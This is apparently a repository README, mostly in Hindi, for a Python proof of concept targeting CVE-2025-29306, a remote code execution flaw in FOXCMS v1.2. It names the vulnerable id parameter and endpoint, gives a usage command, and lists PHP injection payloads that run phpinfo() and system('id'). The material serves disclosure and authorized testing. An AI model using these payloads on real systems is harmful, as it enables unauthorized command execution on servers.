
CVE-2025-29306 के लिए पायथन PoC, FOXCMS v1.2 में एक पैरामीटर इंजेक्शन RCE। अधिकृत सुरक्षा परीक्षण के लिए /images/index.html पर id पैरामीटर के माध्यम से PHP कोड इंजेक्ट करता है।
इस रिपॉजिटरी में FOXCMS v1.2, एक चीनी ओपन-सोर्स कंटेंट मैनेजमेंट सिस्टम, को प्रभावित करने वाली रिमोट कोड एक्जीक्यूशन (RCE) भेद्यता का Python-आधारित PoC शामिल है।
CVE-ID: CVE-2025-29306
प्रभावित करता है: FOXCMS v1.2
प्रकार: सेवा पैरामीटर इंजेक्शन → कोड निष्पादन
FOXCMS /images/index.html एंडपॉइंट पर id पैरामीटर में असुरक्षित पैरामीटर पार्सिंग तंत्र से ग्रस्त है। यह ${@print()} अभिव्यक्तियों का उपयोग करके पेलोड इंजेक्शन की अनुमति देता है, जिससे PHP कोड निष्पादन होता है।
requests लाइब्रेरीpip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
# 🔐 Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.
Inok009